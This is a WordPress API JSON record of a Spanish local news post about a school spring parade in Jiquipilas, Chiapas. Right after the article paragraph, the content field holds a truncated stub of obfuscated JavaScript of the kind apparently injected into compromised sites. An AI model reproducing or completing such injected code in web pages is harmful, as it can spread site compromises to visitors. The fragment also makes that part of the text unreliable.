{"id":14792,"date":"2024-03-23T07:17:00","date_gmt":"2024-03-23T07:17:00","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=14792"},"modified":"2024-03-23T07:17:01","modified_gmt":"2024-03-23T07:17:01","slug":"espectacular-desfile-de-la-primavera-en-jiquipilas","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=14792","title":{"rendered":"Espectacular desfile de la Primavera en Jiquipilas"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"768\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/03\/IMG-20240322-WA0013-1024x768.jpg\" alt=\"\" class=\"wp-image-14793\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/03\/IMG-20240322-WA0013-1024x768.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/03\/IMG-20240322-WA0013-300x225.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/03\/IMG-20240322-WA0013-768x576.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/03\/IMG-20240322-WA0013-1536x1152.jpg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/03\/IMG-20240322-WA0013.jpg 1600w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Redacci\u00f3n. 22 de marzo del 2024. Tuxtla Guti\u00e9rrez. &#8211; Jiquipilas, Chiapas.- La ciudad se luci\u00f3 durante el desfile de la primavera con la participaci\u00f3n de alumnos de planteles de todos los niveles educativos que lograron cautivar a m\u00e1s de un espectador. Los coloridos contingentes recorrieron las principales calles de la ciudad hasta llegar a la explanada del Palacio Municipal, donde se conjug\u00f3 la algarab\u00eda y recibieron aplausos de las autoridades y de familias que abarrotaron el centro. Este a\u00f1o, el desfile fue espectacular, pues cada uno present\u00f3 trajes muy llamativos acordes a la primavera, m\u00fasica y bonitas coreograf\u00edas.Estuvieron presentes en representaci\u00f3n del Gobierno Municipal, la Sindico Municipal Mar\u00eda Yulma Vera Cruz y Georgina Cruz Cruz Directora de Educaci\u00f3n y Cultura entre otros funcionarios p\u00fablicos.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Redacci\u00f3n. 22 de marzo del 2024. Tuxtla Guti\u00e9rrez. &#8211; Jiquipilas, Chiapas.- La ciudad se luci\u00f3 durante el desfile de la primavera con la participaci\u00f3n de alumnos de planteles de todos los niveles educativos que lograron cautivar a m\u00e1s de un espectador. Los coloridos contingentes recorrieron las principales calles de la ciudad hasta llegar a la &hellip;<\/p>\n","protected":false},"author":2,"featured_media":14793,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-14792","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/14792","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=14792"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/14792\/revisions"}],"predecessor-version":[{"id":14794,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/14792\/revisions\/14794"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/14793"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=14792"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=14792"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=14792"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}